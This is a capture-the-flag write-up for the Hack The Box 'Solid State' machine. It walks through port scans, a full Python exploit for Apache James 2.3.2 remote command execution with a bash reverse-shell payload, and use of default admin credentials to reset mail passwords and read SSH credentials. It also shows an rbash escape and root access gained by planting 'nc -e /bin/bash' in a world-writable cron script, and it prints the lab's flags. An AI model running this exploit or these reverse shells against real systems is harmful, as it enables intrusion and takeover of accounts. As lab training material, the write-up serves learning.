Solid State Write-Up

Machine IP - 10.10.10.51

Initial Phase

Starting with the nmap scan, the immediate result is as follows -

root@kali:~/Desktop/Hack The Box/solid state# nmap -F 10.10.10.51 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 18:36 +04 Nmap scan report for 10.10.10.51 Host is up (0.23s latency). Not shown: 95 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 119/tcp open nntp Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds

The full port scan reveals this -

root@kali:~/Desktop/Hack The Box/solid state# nmap -sC -sV -p- -T5 10.10.10.51 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 18:36 +04 Warning: 10.10.10.51 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.10.51 Host is up (0.23s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA) | 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA) |_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519) 25/tcp open smtp JAMES smtpd 2.3.2 |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.68 [10.10.14.68]), 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Home - Solid State Security 110/tcp open pop3 JAMES pop3d 2.3.2 119/tcp open nntp JAMES nntpd (posting ok) 4555/tcp open james-admin JAMES Remote Admin 2.3.2 Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 545.12 seconds

Exploit Phase

The full port scan reveals that the server mainly runs a James Server, which is an Apache mail server. Therefore, searching for the james server exploit with the version as detected by nmap, we see an RCE -

root@kali:~/Desktop/Hack The Box/solid state# searchsploit james ------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------------------------------- ---------------------------------------- Apache James Server 2.2 - SMTP Denial of Service | exploits/multiple/dos/27915.pl Apache James Server 2.3.2 - Remote Command Execution | exploits/linux/remote/35513.py WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow | exploits/windows/remote/944.c ------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result

Thus ,we use the RCE exploit, which basically exploits a function which does not sanitize the username for email users. The program is supposed to make new directories for all users and store the data there. The exploit makes use of the default credentials for the james administrator portal to create the user, which is in fact the exploit string. This creates a bash_completion.d directory, which gets loaded automatically when a user logs on. The payload we use is put inside this directory, which gets loaded upon a user login and thus we can use that payload for the RCE. The code, with the modification to give a reverse shell is as follows -

import socket import sys import time payload = 'bash -i >& /dev/tcp/10.10.14.68/10023 0>&1' user = 'root' pwd = 'root' if len(sys.argv) != 2: sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0]) sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0]) sys.exit(1) ip = sys.argv[1] def recv(s): s.recv(1024) time.sleep(0.2) try: print "[+]Connecting to James Remote Administration Tool..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,4555)) s.recv(1024) s.send(user + "\n") s.recv(1024) s.send(pwd + "\n") s.recv(1024) print "[+]Creating user..." s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n") s.recv(1024) s.send("quit\n") s.close() print "[+]Connecting to James SMTP server..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,25)) s.send("ehlo team@team.pl\r\n") recv(s) print "[+]Sending payload..." s.send("mail from: <'@team.pl>\r\n") recv(s) s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n") recv(s) s.send("data\r\n") recv(s) s.send("From: team@team.pl\r\n") s.send("\r\n") s.send("'\n") s.send(payload + "\n") s.send("\r\n.\r\n") recv(s) s.send("quit\r\n") recv(s) s.close() print "[+]Done! Payload will be executed once somebody logs in." except: print "Connection failed."

Now, we know that the exploit will only work if the james credentials are in fact the default credentials i.e., root:root. Therefore, we try this and find that the credentials are the default ones.

root@kali:~/Desktop/Hack The Box/solid state# telnet 10.10.10.51 4555 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. JAMES Remote Administration Tool 2.3.2 Please enter your login and password Login id: root Password: root Welcome root. HELP for a list of commands HELP Currently implemented commands: help display this help listusers display existing accounts countusers display the number of existing accounts adduser [username] [password] add a new user verify [username] verify if specified user exist deluser [username] delete existing user setpassword [username] [password] sets a user's password setalias [user] [alias] locally forwards all email for 'user' to 'alias' showalias [username] shows a user's current email alias unsetalias [user] unsets an alias for 'user' setforwarding [username] [emailaddress] forwards a user's email to another email address showforwarding [username] shows a user's current email forwarding unsetforwarding [username] removes a forward user [repositoryname] change to another user repository shutdown kills the current JVM (convenient when James is run as a daemon) quit close connection listusers Existing accounts 5 user: james user: thomas user: john user: mindy user: mailadmin setpassword james tanq Password for james reset setpassword thomas tanq Password for thomas reset setpassword mindy tanq Password for mindy reset setpassword mailadmin tanq Password for mailadmin reset quit Bye Connection closed by foreign host.

Upon connecting, we saw what all we could accomplish and thus changed all the passwords for the mail services of all users. Now, we can try to login to the POP3 server to check the emails. We can do this by interacting with the server using nc and the pop3 commands. This is tried for all the 4 users above, but only one user gave results which are useful -

root@kali:~/Desktop/Hack The Box/solid state# telnet 10.10.10.51 110 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mindy +OK PASS tanq +OK Welcome mindy LIST +OK 2 1945 1 1109 2 836 . RETR 1 +OK Message follows Return-Path: <mailadmin@localhost> Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798 for <mindy@localhost>; Tue, 22 Aug 2017 13:13:42 -0400 (EDT) Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT) From: mailadmin@localhost Subject: Welcome Dear Mindy, Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you. We are looking forward to you joining our team and your success at Solid State Security. Respectfully, James . RETR 2 +OK Message follows Return-Path: <mailadmin@localhost> Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581 for <mindy@localhost>; Tue, 22 Aug 2017 13:17:28 -0400 (EDT) Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT) From: mailadmin@localhost Subject: Your Access Dear Mindy, Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. username: mindy pass: P@55W0rd1!2@ Respectfully, James . QUIT +OK Apache James POP3 Server signing off. Connection closed by foreign host.

From here, we successfully got the password for the ssh session of the user mindy. Using this to login, we get the following -

root@kali:~/Desktop/Hack The Box/solid state# ssh mindy@10.10.10.51 mindy@10.10.10.51's password: Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. GIBBERISH mindy@solidstate:~$ ls bin user.txt mindy@solidstate:~$ cat user.txt 914d0a4ebc177889b5b89a23f556fd75

We get the user flag from here. The prompt isn't bash here but its rbash, which is restricted bash. It disallows use of '/' as well as restricts the use of sudo, cd, less, more, vi, nano, man, etc and all other methods of obtaining a bash shell directly. The only way a shell can be executed using bash is using a preloaded construct which will be executed when a user or in this case, mindy, logs in. Turning back to the RCE now, we execute the code after logging out of the shell and relogin while listening on netcat, to ultimately obtain a bash shell bypassed from a jail shell -

root@kali:~/Desktop/Hack The Box/solid state# python james_exploit.py 10.10.10.51 [+]Connecting to James Remote Administration Tool... [+]Creating user... [+]Connecting to James SMTP server... [+]Sending payload... [+]Done! Payload will be executed once somebody logs in.

We start the nc listener, and also log into ssh whic does not give a prompt. The nc listener however has a shell and now we can use that for privilege escalation -

root@kali:~/Desktop/Hack The Box/solid state# nc -lvp 10023 listening on [any] 10023 ... 10.10.10.51: inverse host lookup failed: Unknown host connect to [10.10.14.68] from (UNKNOWN) [10.10.10.51] 47318 ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami whoami mindy ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd .. cd .. ${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd / cd / ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls ls bin boot dev etc home initrd.img initrd.img.old lib lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /bin -writable -user root -type f 2>/dev/null find /bin -writable -user root -type f 2>/dev/null ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /dev -writable -user root -type f 2>/dev/null find /dev -writable -user root -type f 2>/dev/null ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /opt -writable -user root -type f 2>/dev/null find /opt -writable -user root -type f 2>/dev/null ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /opt -writable -user root -type f 2>/dev/null find /opt -writable -user root -type f 2>/dev/null /opt/tmp.py ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cat /opt/tmp.py cat /opt/tmp.py #!/usr/bin/env python import os import sys try: os.system('rm -r /tmp/*') except: sys.exit()

After referring and enumerating for linux privesc, we only find world-writable files to return something which can be useful. The command used for searching searches for files owned by root but are world writable. One such file was in the opt directory as listed above, tmp.py. This is owned by root so therefore might have the effective uid of root. We can try executing this by editing the script. Therefore, we obtain the persistent shell using the following -

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ python -c 'import pty; pty.spawn("/bin/bash");' python -c 'import pty; pty.spawn("/bin/bash");' ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ^Z [1]+ Stopped nc -lvp 10023 root@kali:~/Desktop/Hack The Box/solid state# stty raw -echo root@kali:~/Desktop/Hack The Box/solid state# nc -lvp 10023 ${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ export TERM=screen

Now, we edit the file to open a shell to us using nc -e /bin/bash 10.10.14.68 9999 as payload inside the os.system call. The file may be a regularly executing process but we can't check the crontab of root as we are an underprivileged user. Therefore, we can change the code and then observe if the file is executed or not. After waiting for a few minutes, we get the shell as follows -

root@kali:~/Desktop/Hack The Box/solid state# nc -lvp 9999 listening on [any] 9999 ... 10.10.10.51: inverse host lookup failed: Unknown host connect to [10.10.14.68] from (UNKNOWN) [10.10.10.51] 43938 id uid=0(root) gid=0(root) groups=0(root) cd /root ls root.txt cat root.txt b4c9723a28899b1c45db281d99cc87c9

Thus, we get the root flag as well.